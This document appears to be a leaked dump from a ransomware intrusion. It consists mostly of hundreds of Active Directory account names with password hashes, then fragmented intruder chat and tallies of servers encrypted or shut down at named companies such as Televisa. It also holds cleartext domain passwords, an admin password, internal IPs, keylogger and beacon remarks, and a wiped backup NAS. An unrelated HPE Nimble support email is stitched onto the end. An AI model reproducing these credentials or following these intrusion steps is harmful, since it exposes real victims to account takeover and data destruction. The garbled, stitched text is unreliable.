5337 LilyY a3d7d25665f1146b56192b850fd57a93 512
1722 Kennetht ac73e3569312c470c1173050f9763713 512
9172 ASITC-WS0005$ 9e57afffcbef2ff80156c6f45eea94d8 4096
9215 ASITC-WS0100$ a0dd5d2ac2fd77398d34022ad30af4cd 4096
9185 ASITC-WS0015$ d004d9a9552304e9c3e17401a8d1b741 4096
9145 ASITC-WS0011$ cbabe431f02624d2aeef9f20dccff406 4096
5355 jennyh 0c6ee318d17ec8350c0e4072c7598688 512
9117 ASITC-WS0047$ 2178a6041d81a4db6e93ebdb60bdad93 4096
9195 ASITC-WS0018$ 4b15087c8ba463248e601e8d3bc12d58 4096
9128 ASITC-WS0041$ bae8e6cca6cca90b76a169c8e30ded1c 4096
1109 jenniferl a13fe7d09755075eac80a205bb64fe5c 512
8196 jerryh 3f05f368eb0a6355e7071fb1bd1772f1 512
1108 johnp 76cf8d1787696fa522b1b41876d1bf11 512
9171 ASITC-WS0002$ 526eb819e509b9d36f19884cd292f0eb 4096
1112 rockyx a243ea0a666107e5946362230e328cf3 512
9218 ASITC-WS0103$ f361e82f7477397813e7518335030dbe 4096
5685 warehouse4 a243ea0a666107e594646362230e328cf3 512
8146 LilyW ac73e3569312c470c1173050f9763713 512
9192 ASITC-WS0091$ 8057ddd7385e20cf72b03467b71b1055 4096
40125 angelad cef2eb521883d390b32b0b5bb916f7bb 512
9224 ASITC-WS0124$ e601c71b66cfbd841c2205369019bd12 4096
9222 ASITC-WS0107$ 65e14c85412376d5466beabd34bef078 4096
5675 TomX 91e049ff1cde360a572baa9e56ad06fd 512
1114 leoc 150180de61e3227350ff3d5071491db8 512
9122 ASITC-WS0038$ e1ae58f2ddce651ba004a6e50e58b365 4096
9154 ASITC-WS0019$ 17d89c904db18d8891450f73e9c1102e 4096
9133 ASITC-WS0028$ bdc3f3e7df71268bd68f2e7a0ca210d5 4096
9196 ASITC-WS0074$ d948dbd6bc6ecd5fb22b8b9a01c7f02b 4096
9179 ASITC-WS0007$ b74c2aacf8a4c93d4f4e0ea8e3b5ec7c 4096
5342 nk_admin 27d2802e45ca182a36a973e1196d3140 512
5674 ITCMA-WS1103$ 79dae924620dc3597721c8fb781b0418 4096
1721 Georged 589b85762d8ab451401df29aa7fdc417 512
41106 MSOL_ee11aef66e2f 6c03524467d457057285375c927dc454 66048
5656 winniez 768b312e7c14f5ee736e9d4034e0f305 512
9173 ASITC-WS0082$ c50ff420363cc0c2c3754d1a8cea8816 4096
9134 ASITC-WS0029$ 61e3b015e1181c6dd1e9d63c617e4e11 4096
2214 ITCMA-WS1069$ 5d46cf0d0441efc1f5f87e01c6fefc 4096
6605 JasonC 3dbc75a400cd00a0bc8cf4e0c224942b 512
41113 ITCMA-LT1089$ 8882bc0e7054dea98c44e3ee950ef70e 4096
8128 MaxW 2e15903e952c12546b70e040e2c0108f 512
40124 valeriet 1d06532226cfd222dfe7d3345a624002 512
1121 sueb cef2eb521883d390b32b0b5bb916f7bb 512
1712 kathyor b5fb31b1e2fb8c139e6bcac28bcd7441 512
39646 johnnyp 045d0f10ff8f7211af43cd83cd57dfbb1 512
40181 ITCMA-PDM02$ fee7c0bec5318d556fcd6d24a24d2409 4096
39687 ITCMA-PDM01$ 48f7baea11ec5f7a38ddbc5fc0846999 4096
39696 ITCMA-LT1084$ 4f441d3427ebda9bf1fd27bc28c21d56 4096
9170 ASITC-WS0006$ 49e58bf3899318799d2eda67e1fc454c 4096
9221 ASITC-WS0117$ 58dc929f38be59ba560603bef738da95 4096
9116 ASITC-WS0048$ 2b9b4cc96125ddfd7a21f82eb0d75281 4096
1226 ITC-SHIP01$ 02e9d34a1fc453dfde9912a0e71f48df 4096
39640 mits 5c31c260d6ffad231aa02fb4dd4fba5c 66048
5625 ITCMA-LT1036$ eb8b49dc77472c0c525444cb926ce22f 4096
8166 br_admin 555601b2d489ec2bfb7d189544736c8b 512
5673 ITCMA-WS1102$ f4cba060887dba209fd64aeef486c7a9 4096
8167 ITCMA-LT1067$ 858962301f26159a8fda2486219079a6 4096
8152 ToddD f2a808efade793dd9d6c5c5e0f5a3fdc 512
9174 ASITC-WS0077$ 14eca4102e70e7893ab9172241b26771 4096
40190 ASITC-WS0102$ ff3a54a4f043a3ae507a89f12d9c3baf 4096
8154 PeanutW 785e7255bf1d30e599ee84d67a732a3a 512
39669 clarkq 496d433763519e769c9e959d0924814f 512
9214 ASITC-WS0099$ f4eb1fb33d94882c1971b6e44f180e2b 4096
9115 ASITC-WS0050$ 21b24694208f2fad3efbbe88a0fc4264 4096
9140 ASITC-WS0025$ 084e4246aaf6f222d11ea232c9ca4e4a 4096
9132 ASITC-WS0027$ 631d50d60830b86b79cb04b5428b9e3a 4096
8122 arongQ 4874a28a2801c2867178c6c744bd982e83 512
40202 auto1 b51746b3157de258a4084869a9be10d6 512
1677 scotth 20b2ef7e67106f082391db8fe87ae03d 512
8136 soffit01 71554f0a11b6b0fcd545dabe2b6df955 512
8181 marieb 09774c752585c14081b2afa7422942b9 512
41604 ASITC-WS0135$ 2bba96e281a7a70c6e9b6486fc012110 4096
5661 YvanL 1e09a46bffe68a4cb738b0381af1dc96 512
5659 cindyl 1e09a46bffe68a4cb738b0381af1dc96 512
9147 ASITC-WS0004$ cb151889a847f2585920a641009d8b20 4096
40131 beel ac73e3569312c470c1173050f9763713 512
5346 FlorenceP d30b4866d451361d8f2ef374b873eeac 512
40207 tinag 589b85762d8ab451401df29aa7fdc417 512
5638 elkprod 7d6b2947a290a276376814e7a382e518 512
5136 ITCMA-WS1099$ c6ded49ecb1e547cb7f4247947968e8d 4096
41608 ASITC-WS0168$ 1dd47ec61c86ff0c314245519040568d 4096
41606 ASITC-WS0129$ c7e2b80355118c4116900d886fa8625a 4096
1123 mikec c675d9a7e3e2c28fa987d3ba0a0a83c5 512
2149 ITCMA-WS1052$ d053d2956e5c94d062b6979871c7f6db 4096
41607 ASITC-WS0139$ 4280ad0e0d239158263d251caa1f539d 4096
9113 ASITC-WS0045$ ee5a60769be509dd954b6bbebc1b96ad 4096
8180 egl_admin 08b0ec954a94d3c7f1824957bf3fde72 66048
5217 ITCMA-WS1063$ aed367e6acd55efca95bc451cd8d436a 4096
1315 kellig 05251d1bc8c5176e98d77404b43f11dd 512
2171 AITCWarehouse 589b85762d8ab451401df29aa7fdc417 512
8605 ASITC-FILE01$ db2d3d53d41734ab634cd39b439dea46 4096
1732 michaell 346f769ad1eec38fda1501b164ab401c 512
1668 LABUser 9b665ada5fe4dbfa9ff997bf50fba587 512
39670 annaz 9dd6d72708017033337d5dc64b0183b5 512
1646 ITC-SQL01$ 96c0ec400f7d4bb868c703070b630d73 4096
1124 rhondav 7dc8d897357047e77c496232457e6c29 512
8198 sydneyv 7d478a98cc76ac41dad5d0e295d1256e 512
2174 OpenDNS_Connector 5b2adf3cc355fa00012dec6642fbcb23 66048
5304 SuzanneP 7fbffce5d584353c32eebbffed8185a6 512
1278 ITC-PLM01$ 83bd68b61581913288aceb9207d00153 4096
9162 ASITC-WS0068$ 731b03852edd2b45a7b02dec39495698 4096
9178 ASITC-WS0088$ 8d2d8d8d6525886b6269a4a15b8771c7c4 4096
9114 ASITC-WS0049$ 4002bbd6b1f12639a53928babd87397b 4096
1291 mermaidm 4aa448e40457ecfffabc454d5d814c95 512
9159 ASITC-WS0064$ eccafcb76beba90f9d281b6f29b8ae77 4096
5253 MarkS 4c3879fef394fa5dce0037c197c70841 512
41110 ITCMA-LT1088$ e6643c134cdbf7ed2842d36d9c123ee3 4096
1308 Sophias a20c55fc8a97620cb7da82cdd8a2123c 512
1321 tonyz 6439b5c22963a7d3fdcdbef2e14ea64a 512
9120 ASITC-WS0033$ 9cd945dca0ba209fc0420a249468e746 4096
9203 ASITC-WS0035$ 528aa4c85745626b54e882c86df6f852 4096
9155 ASITC-WS0067$ ab87aa7e043bfe66f6dd4f3a7668d336 4096
9209 ASITC-WS0094$ 03d46c1589497bdc00197af7a585bf6c 4096
9141 ASITC-WS0078$ e87df5023472150321e8d94f0ad63042 4096
9130 ASITC-WS0081$ 48de5b4ea9e4a711b9016974260496fa 4096
9197 ASITC-WS0037$ 2c71afbc106dcdb8c022a7409596dcb3 4096
8159 JasonCh d3f705cd89b4db9b8a53ea79cb257a8a 512
5664 ITCMA-LT1055$ 267a1360303abd9f695fc64cde07bbba 4096
1241 !SSL_ServiceTsk 3609c62b8990d85ab713ae6ed77cebcf 66048
40177 jettl c227421e8189a063150b39c603117530 512
2191 ITCMA-WS1058$ cef74a97bec5eadbb408b249945e1e65 4096
39622 ITCMA-LT1072$ 97228631d61bb16f6cf13544a55efc10 4096
5223 ITCMA-WS1071$ 1fbfa869ed00234c349abb280cc83698 4096
5252 JuanC 687f1627e4133d362f03d6ac6ea53892 512
1667 CARTUser 1028fc03c240cc8ed70ef354339a697e 512
1664 UPSUser2 af35b144ffee4878102b3c9f7773468b 512
2180 ScottM 414a88ab17458ae38689100c7c974642 512
39643 ITCMA-LT1077$ c988f7c681ac0211e847c1d303b205f3 4096
39639 willm a19256a8c37fcc358b4fac9a6e237653 512
5312 ITCMA-LT1048$ 1513a6fc88d006311487115cb1934c39 4128
40147 elkreceiving2 49e4d01ff1faa8e66131e8b362d075f2 512
9106 bkupsvc 7b692769ffe8f2c80bb8e798aab2ac48 66048
5227 ITCMA-LT1031$ 89666bff1c661f261c3ecdeebd1bd38b 4096
5191 ITCMA-WS1026$ 497bc36751be11660d072a284c2d83c0 4096
5150 brads 48422d9ccd934cfb5fcebbca5856b31c 512
1676 garya 12296e0eadce1f32677002ffe3eb1778 512
1675 Melissas 61b9d9d533e8da9787c1627f99bddac7 512
5138 marilouc 42cd437089c9e91e34b98e6b6aa71663 512
5130 todds 34f348628cd5172b706c4c163f83cfa6 512
40198 tessr 921b9f2cb24f8b52b4c89d3a2de3cebd 512
2212 ITCMA-WS1067$ 387ebcc0fdc7309aeeae09670c00c2cf 4096
5684 ITCMA-LT1069$ c26ac2fd55e96cf0b8480f5c92c66526 4096
40189 ITCMA-LT1085$ c4ec35eb1c9edfa3483e4febf769a070 4096
40185 jimb 56f7cf5782cdcf19a42f83036b4e5b05 512
5672 ITCMA-LT1065$ f2de5fb7c429f931297045d9e52b44d9 4096
2162 teds 59a871f3c39563e85f2d07302518e951 512
8148 AndrewF 8f46bf799df8b659cd8bc5fc0bcb35e4 512
5204 rebeccan 51fa7c7a2a313ff469ec7cb18dedc78d 512
41107 ryans 4752c1db828ba42e9628c32670caa28c 512
5650 itcma-ws1093$ 03b59aac9e774188c8ddb8d58e9c7128 4096
5295 ITCMA-LT1042$ e856e89c5f9ebd71836490cb33394ee4 4096
5645 ITCMA-LT1050$ 9f6f53647ac22534ea43a801a2eb40c3 4096
39692 ITCMA-LT1082$ 4c3197b8b85c3d6814e97f58eb233cb7 4096
39690 ITCMA-LT1081$ a89faaa8ee2bcd2443302d0006db4722 4096
1119 chrisf d9227d4a4e8a9cb2014efd590f77537c 512
8165 benr 3de6554c573264dbff829c49e5b1c3ab 512
8142 ITCMA-LT1059$ ca7966e9f54b6409a1b112dc179d5463 4096
41111 ITCMA-LT1039$ 6c4aed3d1097167d27f836b37c009f59 4096
5290 mikea f74af2c3225468e8e55138ae7f3f756b 512
5215 scantofile 746b183cfa4a8f712aa6ddf24e35ade0 66048
5666 ITCMA-LT1058$ 55e4a0a3413aae1578ec870067332c0e 4096
1338 toms b6c8dfb9384e1aff6b0c96ccf5d3d372 512
8173 ITCMA-APP02$ 4151587ab998907f94b31263d862b52c 4096
5339 ITCMA-FILE03$ 4db2224454be54de4890997f7642413a 532480
9175 ASITC-WS0089$ 23f0a7ae78467993f66d3c9390f53aa 4096
1666 ELKUPSUser2 dc4b02eb894f18b53d78197c8ffe024c 512
1714 hmi d9c5f9142b2ebb0db74a4bf1be1f5a92 512
8174 ITCMA-SQL02$ a242663b6b7919475b979455d02b6ef9 4096
40179 damyw 3f5b3dba0b2001c5dce2206657de659d 512
8129 PerryB 82775d998ec703e7641b1b6a9f754afc 512
1148 shipping d1fd53f75570fdcd068131bfe9bba98c 512
39699 ADMIN-WIN10$ 74c4be79cbd55618f3d03d61d3e6e155 4096
5222 ITCMA-WS1068$ ae91c6879c8b788f20d321293ca0687d 4096
1253 UPSUser af35b144ffee4878102b3c9f7773468b 512
40205 ITCMA-LT1075A$ 37dd9d6b0946ad54fd0363b0423961df 4096
5233 MichealL 305367a78b9da467f8a51bcebeba14f3 512
39605 DESKTOP-2K97RKS$ a4dcf170edb8f1bb5d74b87fde6e7a5f 4096
8131 ITCMA-LT1056$ a3a15993129dee61e4ed21218ec11e0b 4096
41114 shelbyf 73cc477f6f9f435b260d82064832a452 512
1142 rebeccav 366f6b114b44d6e45517809707c36be1 512
5173 dirrickf 0ecbe5adf5d974ddaa39619a13cd7ab4 512
5220 ITCMA-WS1066$ 40a077add23aa2ebdb5818bd031bf307 4096
5231 ITCMA-LT1033$ 74855c5256c06c1ee98279a08c8d1763 4096
5286 ITCMA-LT1037$ e86ab9c34a6b34c3a62818cfe0e12691 4096
8604 ASITC-APP01$ d0881c6838886a9e66ff379789e63833f 4096
9146 ASITC-WS0080$ 9ec15af2f32331f7487b26562cc42705 4096
1110 kittyl b996e84bb89f6220f5c3807565b6b7d0 512
2154 dannyz e7b74e7fab85bf87e19970c2bd85ea49 512
5148 lenay acbfc03df96e93cf7294a01a6abbda33 512
5325 MinaL 1e09a46bffe68a4cb738b0381af1dc96 512
2208 kayl 6e4b9a5b9d3b7848e7335a0b8fdfc80d 512
40134 samh 4c3879fef394fa5dce0037c197c70841 512
9177 ASITC-WS0090$ 62b7dba943140ed72486e7563a2cd8b9 4096
9105 ITCMA-ENG04$ 308e6f0d0c31d0028c5e0c6fd7408b4b 4096
5146 tommyl 589b85762d8ab451401df29aa7fdc417 512
9194 ASITC-WS0026$ 86a0ab4dc8c7525214fc0da20626bc65 4096
5626 ITCMA-WS1079$ 50441517b15a4c83e9609d858809dd47 4096
39638 infor_edi 1941c372c3c802defa0af03fddf10c04 66048
1309 Davids 8ee8bf3b64f0064eb92f217c772537ca 512
8140 FrankM a0c046c39e44cf25dd13b64a0ad76ba2 512
39650 yvonnew ac73e3569312c470c1173050f9763713 512
40186 its-macbook-pro$ c629fa10ebdf80214797d0e23faa41b3 4096
5635 ITCMA-WS1083$ 3404ebdbb4e84243145f7774264f71b7 4096
40148 briang 1d32ad40cecbc0419f99a08e0845dd66 512
40184 jamesong 5edca7360010cbc2ab0fead3aabe956f 512
40209 angelar 16a1285d0f4e4a0cf054c6352a0c095d 512
40208 sergiog 00c1f9555484a4e195f8b94505ccdbd5 512
40210 amberg 59fdc659b9880d993a329bc756a42256 512
41120 shenandoahv 87dcfbfbfeea7f85a43957e0850834ab 512
39648 devb 4bf03c4aa37d8389cacc45e526aa0b38 512
40211 michald 6ccc06be81b8b09d60079974ba9db2bb 512
8169 ITCMA-WS1104$ 5953e40b3938b0fb62208022d39eb9e9 4096
9125 ASITC-WS0043$ 87ec000a514789bec89fd918899fcfd6 4096
1218 laurac bfaac897b28785368be4da98b9a0d0a6 512
1136 miket b62f3243655382a981101440602b41f1 512
6615 eagle 7b692769ffe8f2c80bb8e798aab2ac48 66048
9181 ASITC-WS0056$ 1aa89d969639fccdfb04791007978d53 4096
40118 ITCMA-LT1071$ 541bcadfd13d7e3ade7a096a93d7dd2a 4096
41109 makennav a994e5abc8147600c5d0583d7b6eb3ec 512
8111 ITCMA-WS1096$ 5808f63ae3602b42bdfa6850c16946b1 4128
41121 kevink ac6cd6418d4c26a045130e375a3c506b 512
1725 Kevinz 3dc28ff71f35d8e9710efc8b4cf806de 512
5636 ITCMA-LT1046$ 557e5ffbee69f8230c459e0152360bd9 4096
1225 ITC-APP01$ c540266f62332be049066bb283de2ad0 4096
2213 ITCMA-WS1070$ 9801015586f63e13b511204bbc41414d 4096
9160 ASITC-WS0070$ 7d75195cf0e25398cdfe6cf6ba42de89 4096
8164 RubyZ a882591c875ae54533fc6f14fa6173ce 512
40137 tobyz 199b266b3092ea1efee1d81a017c481b 512
1282 sherryl afc5283b49e82c8ac72f89b82be0f758 512
2186 jackyh 0672f1fd9d5ab94d376cc2a43ef892fc 512
9184 ASITC-WS0014$ 0999c110034768046023751e6ba1ce78 4096
40132 nicoc 589b85762d8ab451401df29aa7fdc417 512
5211 billl f37ab74d11ba8d794987fab03a58403c 512
1325 NancyZ 132c1e433f064060a370c0e9c4d28eb6 512
5335 DarayC 4cae4b4e9d177b0bf725b62226abf740 512
8149 JackZ 06a750a192abd9537ed8686d08b02f49 512
41605 ASITC-WS0136$ 1cbf5953a90d46ce8f8de3d82c2135db 4096
40145 ITMCA-LT1080$ e67e8dc0b3b37509aa60815ba37da4d7 4096
9131 ASITC-WS0072$ 53167030a37271d9246a7aa7327d7f68 4096
5688 ASITC-DC01$ beb8bb0fdd50b87ba48bd979b54736b8 532480
1636 davidr 247f65d89f9ab9e6f85da87fef9c84eba 512
39700 ITCMA-PRINT-SVR$ cfcd4fe5685597b9476ec1f2b92a2667 4096
8157 WarehouseLeader 8aa0f378d8599eb42b0156c7b8f981e0 512
5639 ITCMA-LT1049$ 0b5e0acef3de4fef2d12b21bf83ecfc9 4096
5629 ITCMA-WS1081$ d0451c2ba33b521925ea2837957019a6 4096
1149 andrewm 41b055063b922eb200e05e0665216900 512
39631 ITCMA-LT1074$ 0b1683f6e9a8caa5128f8d1d0f77c49e 4096
9204 ASITC-WS0086$ 04a2fbac7c05f2d0b3222b36f5c773c9 4096
5630 ITCMA-LT1044$ 30149233998aa92322877831261ecff6 4096
9176 ASITC-WS0073$ 9b76cb2971784e4c5aa6e69d65cf3dd6 4096
5640 ITCMA-WS1089$ 29b5e841b13e010e4259fa8f8a75ac71 4096
1244 Philipb c6e7e05b483681c06169eda2c48689a9 512
2197 Elkreceiving 88f15581c12034e22387d5525101a892 512
5663 ITCMA-LT1052$ 4b27ff15193a56cf72d1784da5c7be35 4096
40143 ITCMA-LT1078$ 8cfdcc1544a281d08061ca6731549319 4096
5331 ITCMA-WS1086$ a66e29ae4c6eff3d2c1bd4502b9470b7 4096
5316 ITCMA-WS1088$ 6eb66e69da9559da92f3a046b451db30 4096
39652 ITCMA-LT1079$ 0f106efcb1fc0d3dc123eda3b03d6a44 4096
8176 chrish 4c605d1a2ec161770816400927e35c1d 512
1135 greggh 6bd042586c6b3caef7e03d25f260b84f 512
39645 ITCMA-LT1076$ 7d3296432028512ab4902608888a5030 4128
9107 ITC-PLM02$ 84747a0bd7330d7388f82ebf5a4f6242 4096
40194 ITCMA-LT1086$ a742bcefedbcabee3487056dbc8ee4a4 4096
1222 davem c5af95985a288dc02cbfe9f08d56c57a 512
5653 JasonH e8ef93628fd7148f2833e7b48a1610d4 512
40201 ITCMA-WS1100A$ e4793f7b063d95a910f84d864c3855f2 4096
5344 itcma-lt1051$ 3131c041b16fd74e822bdbd7ce33e74c 4096
1128 billm d1b753453d1babe132217d7e3d738e36 512
39663 freshservice f50ea5bf66b0901306e8db471c80f6 512
5668 ITCMA-LT1061$ 525a9ad3108afe8c93e4041550915221 4096
2204 cassiel d37001504f330930930271fa40863ad0977 512
5172 ITCMA-WS1059$ 44a1d1bc8cadd009439c398c5f99c4be 4096
40203 karolynk c62f11452548e5860f8df083a488d378 512
40196 ITCMA-LT1087$ 2b358ce837969534ae4c11be8f668783 4128
9167 ASITC-WS0023$ 5fe2cd8c82a551c163a2f32bd361c3dd 4096
8118 EllenL 1ee6b8270b6eee2a9a06b7b49efaee4b 512
9148 ASITC-WS0059$ 6de2a3f710075ab0c368fcdd754ab957 4096
2168 PeterP b7e98d67d450a6e8cc7c6cc2c7259b 512
2170 bellaf 589b85762d8ab451401df29aa7fdc417 512
8150 ShannonR 4478251daf3dd7961b805f5fd1306fce 512
5334 ITCMA-WS1092$ b5f1809435b128ced7a8c956b86c7976 4096
41112 lunah 589b85762d8ab451401df29aa7fdc417 512
9166 ASITC-WS0024$ a2f51875d8c47f9d40a8a0cd440069a8 4096
5209 SQL_Services 0a439b9c925710be50b7cb1f2e66a37e 66048
1289 stevel 2d065f436e8300d30e05e552e266c5ef 512
9191 ASITC-WS0054$ 5fc55ecf64adce9ff593de9b7951d1f4 4096
5240 ITCMA-FILE02$ 12b0ed1384146ccffd020f39378aad6a 532480
9220 ASITC-WS0118$ dcc6caa17f7df07b458a75c2435c12ff 4096
39701 ITCMA-RDS-SVR01$ 7d527a538c39f4f4d47342fe34af527f 4096
5287 AlanS 08475e239783c166d5c35f940a15ffa5 512
1137 suellenc 7c98ab757299b4e6b102e8b6db6db33b 512
5326 DennisZ 41be95cb06542e4dde52784e49735921 512
41609 ASITC-WS0201$ cf1f80af2f1a8279fda86ad90074a235 4096
40192 ITC-DC-SVR01$ 8058ee87cd2e147c2b1b8fa17512ec3d 532480
5147 smitht ac73e3569312c470c1173050f9763713 512
5634 ITCMA-WS1082$ afb0631ce1aa2504b7bada2e9bcad27d 4096
1133 keng e8568c9ae1e15dacf8336cd6fb5d428e 512
5620 ITCMA-WS1075$ 99e4f2fe05a381d12e3248d1938c75d6 4096
5333 PhilipJ cef2eb521883d390b32b0b5bb916f7bb 512
5299 SevM de7bab8e4b98b6c8b6287085f73c8592 512
5282 ITCMA-LT1038$ 3b54a3c420e79658948fc617847cf88d 4096
5309 JudyB ff85c532cb37f917934ae5de662ef493 512
8120 ITCMA-LT1053$ ce92e3e3e6689888cb084c45f67a882a54 4096
1125 chars 8d0491b148a4a8e097a51f426b437d42 512
8184 brandent fced468d4c2103847b007cb4765c6e55 512
8182 ITCMA-WS$ 7e407f2c3e54dc2744b30185b7ad9c46 4096
500 Administrator 0cc0cdacd8aa7f3b06e7cdfffa909b11 66048
5281 SandyM 1d73e704a42de6cfd317b0f88a4e658c 512
1719 jamesn d6c67163e32e3dac2b782c87ade65ad9 512
41118 ITCMA-LT1091$ a41dba55bb5c31b134ec2739a79e5e1d 4096
40171 alyssaw c510df06d92c28c967cf18634b068468 512
40127 ITCMA-MITS01$ d78c60dab4360d4056284e568ee8823e 4096
where did you get without a domain did not take the risk yet where the administrator did not show pinged all machines yesterday and let the brute force with the domain on the ms17 did not work this LA - domain user there is a system, no current craps except the current LA do not roll?
remote.itc-us.com
```
can itc-us.com be accessed in the file? this particular pcc 139 445 3389? is it ok now? user7user8good, already interesting itc-us.com microadmins, i checked itc-us.com
CORP\agam_wipro T3l3visa.2020#
CORP\praveen_wipro Vandana@1910
CORP\ctxdbadmin T3l3v1$a$f32018.+
CORP\ntxvmmadmin T3l3v1$a$f32018.+
CORP\poonam_wipro T3l3visa.2020#
``Some movement has occurred. No movement so far.``
i checked the jjgarcian, aruizmon sessions and found no craps, those that were kerd did not fit
i checked everything and everyone on la and i checked for passwords
nothing (glaselbl[ ](https://mediaeveryone.com/group/0-dead-waterway-com?msg=Pw7n6Ew6WELxcbuso) > vve8 beacon> sleep 100
??0.dead.waterway.comkobu meemi nicht mehr als die kobu wirkschlossen in slipknot 1000[ ](https://mediaeveryone.com/group/waterway-com?msg=N7wWs4gzjXxN7BAT8) +goodnight
see you tomorrow = )Adios, everybody, see you tomorrowhttp://vk.com/@thntofff-ataki-na-active-director-razbiraem-aktualnye-metody-robshihs all gonehiiGood morningMay somebody open the door? Good night, everybody. ночи)eyJhbGciOiJBkR+CHgTScqu0UHOK2Tm5xW1XvgapBW0Odd68qE1mtpJ4i/nvotqRFTfvUetMdfvVqPL6CnA2t1TBvmEKq5kKlXTVHBMWkzjuChnspsl7PDUQJfixnzzz15uOrIAXw498s5/WRaRlfCfGWEkyGvhElSPaVP/StAeMXRVMWtKbetKzGAlguN3WT8YPld31iX0ZybfkOmKU7pKleeU4WAP0xA==eyJhbGciOiJB1pIzM1eSyi47r6v1al+9Wzq+T1TgC4M7xnZSkwkg/4v+pJ/xPg6BWJYt5unKzIL/6+WfepWRTn9INTUkoY9fb6T4rdPKwYpLL7wrnsbgltRef8xm2tSUeDARHvOSOoQf6IpPINIVaHiPlp4KUz90HMzZWCSPjQSjftBXa3rAODnZWfUizKXqNBEu/WzTpXgr6ksIjbyYEUy8pkrp+o43A3RH8HZN3QAMOK0spJMnEHEkboLtgsoQ1C0JczTj3AvZAzluT2gN6oZxNQwrVL27fmFU4DpZRH0wWXRvMr+FKAsO+Cko3Aptk9pNuxY5PH4JsoZWx7zI6IU5DkgyVxxpzQ5JHPfnbn5FdZKYRmurmXGJYjqCiww0VNpkRqqLvG3d6ZI3JDgVE6n2x9FAcdBa9Xj6IuB9wdfYTq6mjWkLpZaJqD4tEeqEPVN/qHRgNNlAoT1+pJ36p27PV7El+iXXgcQCCBzKrooy5eyrxB/+uGiyuG2tWqPoHeiJDFRSvc5KuxjnVMoSYOiNyaIQ7iO2tvV4YfHBG+4WN6fzeIGl83J9V20wtQ6aLzdUi7H7mdVMU75bY3PZVctFnu/Z0w7ZIlxG9Hgk3Wiud9Poq8m4bPzvpVB9C/hzeBqXG951GU2KZcrUf0MsoVBBeBed+1h7VkXXWq8/C3gOCtnhPBVIzf29ZdnguutdfkhcS3+RxUsb26WdyGFCEAX0pJOcRQONzGWq/Yx3SDfkgd6hnVYcTKN7OOEGIEdxXB+NahnbTc+RpprzfUbcom``
CORP:
    srvs:
        by hell: 617
        alive:513
        closed:415 (8 stopped pinging\90 masked and killed processes)
    arms:
        in hell: 5383
        alive: 1,177
 
EQUIP:
    srvs:
        by hell: 7
        alive: 7
        shut down: 7
    arms:
        by hell: 510
        alive: 175
 
FILIAL:
    srvs:
        by hell: 51
        alive: 43
        shut down: 43
    arms:
        by hell: 1,057
        alive: 359
 
TELEVISA:
    srvs:
        by hell: 6
        alive: 6
        shut down: 6
    arms:
        by hell: 5
        alive: 0
 
TSM:
    srvs:
        by hell: 64
        alive: 61
        shut down: 56 (5 were masked)
    arms:
        by hell: 1,287
        alive: 488

all live armas were distributed and the build is running and disks were shared
vim's server is encrypted
found one NAS with old backups - it's been wiped
````equiposoi.com.mx`DA`
```
televisa.com.mx\EndPoint 1b88d8b5594f3c678e385e1542343a67
 
corp\IWAM_GSCCORP 1eb54402478918c76dfb96ddc8d433a7
 
equip\IWAM_GSCEQUIPOSOI 7ea993872e793d33af66dbe9e5d70b6d
 
filial\IWAM_GSCFILIAL 232635a056930205a1c94250de111114
 
tsm\ES050616T b3d68fa099d16c02fe6e79646133730f
````CORP\IWAM_GSCCORP $iHlpk#~sCOG6sJ!y]k7+{IHm````
Shares for 10.7.39.52:
	[--- Listable Shares ---]
		Copia de CORPSFEVSWEB02
``````
krsantiagoc-SNG16843-CHROME
        https://home.mcafee.com/Secure/ResetPassword.aspx
jdcardenasm-CHA13887-CHROME
        https://home.mcafee.com/Secure/ResetPassword.aspx
        https://home.mcafee.com/secure/protected/login.aspx
amorela-SFE17310-CHROME
        https://dellem.mcafeemobilesecurity.com/resetPin.aspx

``````
10.7.215.48
10.7.1.252
10.7.15.239
````10.7.215.61``10.7.15.210`
```
10.7.15.137
10.7.15.240
10.7.215.32
10.7.215.32
10.7.216.36
````10.7.15.243``10.7.39.67``10.7.15.118``10.7.39.50`[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=x7DkKtrixs4fs8n46) admin
Angel123*`10.7.216.49````
administracionbur-CORPKIOVEEAM02-CHROME
        http://10.7.6.122/Login.aspx

``I wrote that no@tl1 New grids will be today? not everywhere there is a note keylogging? to the fact that they are not itching at all ... well, I see) waiting for login + alertno not alertaet more min 30 minutes how long will wait for the alerts? at threetut, I checked e-mail as if one @user8 does everything look for files there@all where everything? what do we have on the mouth? so they certainly changed passes) aha
at first the exh was not available, but the problem was in the proc))
i checked 4 admins - no passwords? no, i can't get info on rtp in the mail? ready at 17:30 thank you + keylog is ready, anyone have blauer? all have keylog working? i have 1,3 except blauer know exactly what i have, do we all have sessions?
 displayName: Dianne Jarden
>displayName: Brandon Lauer
>displayName: Greg Keller
>displayName: Mark Harper
>displayName: Mike Pusatera
Or at 5:00 in the morning? What are they writing there 2 people at #1-done-rtpcompany-com read the post at 4:30 ready at 5 work with water at 5 that's it, it didn't want to go in, it only went in at 10.
The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action

In situation where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time".
The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed, if so desired.
If the Array Group was updated to NimbleOS 5.1.x for over 90 days and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation to avoid repeat notification.
If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: login to the HPE InfoSight Web Portal at http://infosight.hpe.com/ Under the Wellness tab,
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
* Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
* Uncheck the "Create Issue?" checkbox next to a specific serial number.

NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually.

If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution.

